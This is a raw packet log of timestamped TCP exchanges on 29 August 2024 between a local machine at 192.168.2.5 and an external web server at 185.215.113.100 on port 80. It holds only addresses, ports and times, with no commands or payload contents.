Aug 29, 2024 15:42:55.322407961 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.322431087 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.322448969 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.322710037 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.322721004 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.322730064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.322740078 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.322758913 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.322777987 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.322848082 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.322859049 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.322868109 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.322895050 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.322896957 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.322906971 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.322912931 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.322918892 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.322930098 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.322938919 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.322942019 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.322953939 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.322957039 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.322964907 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.322974920 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.322983980 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.322989941 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.323003054 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.323014021 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.323014021 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.323048115 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.414208889 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.414227009 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.414294958 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.476278067 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476314068 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476331949 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476349115 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476360083 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476371050 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476382017 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476392984 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476403952 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476411104 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.476411104 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.476417065 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476439953 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476457119 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.476478100 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.476496935 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476526976 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476537943 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476547956 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476557970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476566076 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.476569891 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476578951 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.476578951 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.476584911 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476598024 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476608992 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476610899 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.476620913 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476644993 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.476696968 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.476828098 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476844072 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476855040 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476866007 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476877928 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476886988 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.476888895 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476901054 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.476903915 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476919889 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476933956 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476942062 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.476943016 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.476947069 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.476974010 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.477010965 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.477098942 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477112055 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477121115 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477161884 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.477175951 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.477247953 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477258921 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477271080 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477283001 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477300882 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.477304935 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477323055 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477333069 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477340937 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.477340937 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.477341890 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477355957 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477365971 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477379084 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477391005 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477399111 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.477399111 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.477402925 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477415085 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477421999 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.477427959 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477432966 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.477440119 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477452993 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477463961 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477471113 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.477477074 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477483988 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.477523088 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.477523088 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.477797985 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.477842093 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478044033 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478056908 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478068113 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478079081 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478089094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478100061 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478111029 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478118896 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478118896 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478122950 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478132963 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478137016 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478148937 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478158951 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478169918 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478176117 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478182077 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478198051 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478209019 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478209019 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478212118 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478223085 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478225946 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478236914 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478249073 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478260040 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478280067 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478280067 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478311062 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478481054 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478492975 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478502989 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478549957 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478549957 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478629112 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478641033 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478651047 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478662014 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478672028 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478682995 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478688955 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478696108 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478708029 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478719950 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478732109 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478732109 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478739977 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478740931 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478755951 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478790045 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478790045 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478806973 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478813887 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478818893 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478831053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478842020 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478849888 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478853941 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478863001 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478869915 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478883028 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478892088 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478893995 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478907108 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478918076 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478929043 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478935957 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478935957 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.478941917 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478952885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.478971004 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.479001999 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.479001999 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.479547024 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.479557991 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.479568005 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.479578018 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.479588985 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.479595900 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.479600906 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.479613066 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.479624033 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.479634047 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.479638100 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.479638100 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.479645967 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.479657888 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.479660988 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.479672909 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.479684114 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.479690075 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.479713917 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.479770899 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.557385921 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557399035 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557410002 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557463884 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557475090 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557486057 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557492018 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.557499886 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557507038 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.557543039 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.557565928 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557655096 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.557688951 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557699919 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557709932 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557719946 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557729959 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557740927 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557751894 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557754993 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.557769060 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.557784081 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.557811022 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.557826996 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557837963 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557848930 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557861090 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557873011 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.557889938 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.557900906 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.557919979 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.558033943 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558043957 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558053970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558064938 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558074951 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558079004 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.558087111 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558100939 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558113098 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558125019 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558129072 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.558129072 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.558165073 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.558165073 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.558204889 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558252096 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.558362007 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558378935 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558393955 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558404922 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558415890 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558422089 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.558422089 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.558427095 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558439016 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558449984 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558456898 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.558460951 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558470964 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558471918 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.558484077 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.558484077 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558500051 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558511972 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558517933 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.558523893 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558538914 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.558551073 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.558582067 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.558582067 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.559144974 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559156895 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559180975 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559191942 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559201956 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.559204102 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559216022 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559226990 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559227943 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.559237957 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559248924 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559257984 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559267044 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.559271097 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559281111 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.559284925 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559297085 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559308052 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559319973 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559330940 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559334040 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.559334040 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.559344053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559354067 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559385061 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.559385061 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.559407949 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559418917 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559431076 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559433937 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.559441090 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559478045 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.559504986 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.559534073 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559544086 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559549093 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559557915 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559561968 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559573889 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559583902 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559593916 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559602976 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.559606075 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559621096 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559632063 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559633017 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.559653044 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559660912 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.559660912 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:55.559674025 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559686899 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:55.559695959 CEST	80	49704	185.215.113.100	192.168.2.5
